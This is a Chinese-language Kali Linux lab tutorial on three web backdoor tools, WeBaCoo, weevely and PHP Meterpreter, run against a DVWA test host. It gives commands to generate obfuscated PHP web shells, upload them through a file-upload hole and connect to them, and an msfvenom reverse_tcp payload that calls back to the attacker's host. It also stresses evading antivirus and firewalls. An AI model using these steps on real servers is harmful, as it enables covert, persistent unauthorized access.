Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter

注：如下内容仅供学习使用，其余行为均与做者无关！转载请注明出处，谢谢！

本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具一般用于维护控制权。

实验环境：

● KALI 的IP地址是192.168.44.138；

● Metasploit的IP地址是192.168.44.130 ;

1、 WeBaCoo

WeBaCoo（Web Backdoor Cookie）是一款隐蔽的脚本类Web后门工具。借助HTTP协议，它可在客户端和Web服务器之间实现执行代码的网页终端。WeBaCoo的精妙之处在于，Web服务器和客户端之间的通讯载体是Cookie。这就意味着多数的杀毒软件、网络入侵检测/防护系统、网络防火墙和应用程序防火墙都没法检测到后门的存在。

一、WeBaCoo有两种操做模式。

● Generation（生产线模式）：指定-g 选项可进入这种模式。用户可在这种模式下制做PHP 代码的payload。

● Terminal（终端模式）：指定-t选项可进入这种模式。用户可在这种模式下链接到被测主机的后门程序。

二、在WeBaCoo 的HTTP Cookie 中，如下三个参数的做用最为重要。

● cm：以Base64 编码的shell指令。

● cn：加载着编码后输出内容的Cookie名称。

● cp：封装编码后输出内容的分隔符。

三、启动WeBaCoo程序，在终端中执行如下命令：

#webacoo -h

与生成模式有关的命令行选项以下。

4、实例：

（1）用默认的设置，生成名为test.php的PHP后门程序，并使用WeBaCoo的代码混淆技术对后门进行处理，命令以下：

root@kali:~# webacoo -g -o test.php

（2）查看文件test.php的内容如图所示：

（3）接下来，把这个后门文件上传到被测主机（192.168.44.130）。我这里经过dvwa文件上传作测试：

（4）上传后访问执行：

（5）接下来就可使用如下指令链接到被测主机的后门程序。

root@kali:~# webacoo -t -u http://192.168.44.130/dvwa/hackable/uploads/test.php这样就能够链接到主机上的Web shell：

（6）防火墙和代理服务器只可以发现客户端在发送以下请求：

服务端的响应信息以下：

上述HTTP request和 response代表，WeBaCoo后门的客户端和服务器端的通讯是不易发现的加密会话。它所用的混淆技术下降了它被发觉的可能性。

2、 weevely

weevely 是一款具备高隐蔽性的针对PHP 平台的Web shell。它实现了SSH 风格的终端界面，并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透。下面是weevely的主要功能:

（1）它有30多种可完成自动管理渗透后期任务的功能模块。这些模块可以：

执行命令和浏览远程文件系统；

检测常见的服务器配置问题；

创造TCP shell和reverse shell；

在被测主机上安装HTTP代理；

利用目标主机进行端口扫描。

（2）使用HTTP Cookie做为后门通讯的载体；

（3）支持密码认证；

一、启动weevely程序，可在终端中使用如下命令；。

root@kali:~# weevely

weeavely的主要用途是：

● 生成混淆PHP backdoor；

● 在图像文件中追加多态的后门程序，并可经过.htaccess 文件赋予图像文件执行权限；

● 生成后门.htaccess 文件。

● 可经过help选项列出程序的所有模块和生成工具。

2、实例：

（1）生成混淆PHP backdoor，并将后门保存为test1.php，命令以下：

root@kali:~# weevely generate password test1.php

（2）上述指令生成的test1.php的内容如图所示。

（3）而后经过正常的途径或利用程序的漏洞，把后门文件上传到目标服务器上。

（4）访问成功上传的Webshell;

（5）链接Webshell，命令以下：

root@kali:~# weevely http://192.168.44.130/dvwa/hackable/uploads/test1.php password

只要链接成功，您就能链接到weevely的Web shell上。而后执行命令，查看目标主机的信息；

（6）上述信息代表，咱们成功地链接到被测主机的Webshell。经过:help指令查看weevely支持的各类指令：

（7）使用net_scan模块扫描被测主机的22,80,8080端口；

www-data@192.168.44.130:/var/www/dvwa/hackable/uploads $ :net_scan 192.168.44.130 22,80,8080

扫描结果以下：

您可随时使用组合键Ctrl+D 退出weevely shell。

3、PHP Meterpreter

Metasploit 有一个名为PHP Meterpreter的payload。这个模块能够建立具备Meterpreter功能的PHP Web shell。利用目标的漏洞（诸如常见的注入和上传漏洞）以后，再把它的shell传到目标主机便可。

1、实例

（1）制做PHP meterpreter，命令以下：

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.44.138 -f raw> php-meter.php

上述指令各选项的做用以下。

● -p：指定payload 为php/meterpreter/reverse_tcp。

● -f：设置输出格式（raw）。

Metasploit 会把生成的PHP meterpreter保存为文件php-mter.php。

（2）在上传后门到被测主机以前，首先要删除脚本第一行的注释。注释后文件内容以下：

（3）在Kali的主机上启动Metasploit Console（msfconsole），并启动multi/handler exploit。指定制做shell后门时用的 php/meterpreter/reverse_tcp payload。设置LHOST为Kali主机的IP 地址。使用exploit指令运行exploit的受理程序（handler）；

（4）在利用注入或者远程文件包含漏洞等Web漏洞以后，把Web shell上传到目标服务器；

（5）访问上传的webshell :

(6) 以后，在运行Kali的测试主机上，Metasploit程序将会显示Meterpreter会话；

此时，您就可使用sysinfo和getuid之类的命令了。